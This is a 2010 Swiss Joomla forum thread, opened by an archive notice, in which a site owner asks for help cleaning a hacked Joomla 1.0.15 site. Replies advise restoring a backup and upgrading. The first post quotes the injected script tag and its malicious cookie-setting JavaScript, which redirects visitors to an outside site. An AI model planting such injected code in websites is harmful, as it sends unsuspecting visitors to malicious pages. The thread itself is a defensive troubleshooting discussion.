Joomla! Forum Schweiz wird Teil der D-A-CH Community

Nach vielen Jahren als zentrale Anlaufstelle für Fragen rund um Joomla! in der Schweiz wird das Joomla! Forum Schweiz künftig als Archiv weitergeführt.

Die Joomla!-Communities aus Deutschland, Österreich und der Schweiz arbeiten heute enger denn je zusammen. Deshalb bündeln wir künftig auch den deutschsprachigen Support und Austausch an einem gemeinsamen Ort im Joomla! D-A-CH Forum.

Für neue Fragen, Diskussionen und den Austausch mit der Community nutzt bitte ab sofort:

forum.joomla.de

Das Joomla! Forum Schweiz bleibt weiterhin bestehen und wird als Archiv im Lesemodus erhalten. Die vielen Beiträge, Lösungen und Erfahrungen aus den vergangenen Jahren bleiben damit weiterhin zugänglich und über die Suche auffindbar.

Wir bedanken uns herzlich bei allen Mitgliedern, Moderatoren und Helfern, die das Schweizer Joomla! Forum über viele Jahre mit ihrem Wissen und ihrem Engagement geprägt haben.

Wir sehen uns im Joomla! D-A-CH Forum!

Joomla 1.0.15 stable - infiziert! wer kann helfen?

  • gwdgmbh
  • Autor
  • Neues Mitglied
  • Neues Mitglied
Mehr
27 Okt. 2010 01:33 #27340 von gwdgmbh
hallo
gibt es jemand der mir hilft eine seite welche infisziert wurde zu bereinigen?
einziges merkmal ist folgende zeile im quellcode:
Code:
<script src="http://voip.dialistico.net/products/voip.php"></script>

dieses php file sieht drin so aus:
Code:
var name="searchvoip10"; var value="1"; var maxage=(60*60*24*20); var gotourl="http://www3.best-pcmaster.in/?780e3eac0d=%9B%EC%E0%97k%94%95%AA%A9S%E0%CC%D1%9E%A6%9A%D9%E6%9A%A6%A4h%9Dd%CAl%C6%91%9Bh%95%9B"; var allcookies = document.cookie; var mycookie = allcookies.indexOf(name + "="); if (mycookie==-1) { if (navigator.cookieEnabled == true) { if (gotourl!="") { document.cookie=name + "=" + escape(value) + "; max-age=" + maxage + "; path=/"; location.replace(gotourl); } } }

leider habe ich nach x stunden googeln und foren lesen keine lösung gefunden und gelange nun an euch profis.

kann jemand behilflich sein?
Mehr
27 Okt. 2010 07:33 #27342 von jimbo
Entferne die Zeile... Damit ist es aber vermutlich nicht getan, vermutlich ist die Installation auch an anderer Stelle verseucht. Es ist wohl praktisch unmöglich, alle "Infizierungen" auf zu spüren und zu entfernen, darum hilft in der Regel nur das Zurückspielen eines aktuellen Backups von vor der Verseuchung.

Noch wichtiger wäre, zu ergründen wie der Hacker Zugriff auf Deine Seite bekam, um diese Lücke zu stopfen.

WICHTIG: Eigentlich lohnt sich die ganze Mühe nicht, der Support von Joomla 1.0.x wurde vor ca. eineinhalb Jahren eingestellt – diese wäre nun der richtige Zeitpunkt um das Projekt auf die 1.5.x zu portieren.

Gruss Dany (Jimbo)
Kein Support per PN.
Mehr
27 Okt. 2010 18:07 #27344 von Grazioli
Hallo,

wie es jimbo schon schrieb "es lohnt sich nicht wirklich"!

Du hats eine PN! :D
  • gwdgmbh
  • Autor
  • Neues Mitglied
  • Neues Mitglied
Mehr
01 Nov. 2010 08:48 #27373 von gwdgmbh
Danke Simon für Deine Hilfe.

Lösung:
Das Problem war nicht Joomla sondern eine Laienhaft programmierte Sprachweiche, über welche sich die Joomlainstallation nachher infiszierte.
Powered by Kunena Forum

Joomla! Verband Schweiz - Mitglied werden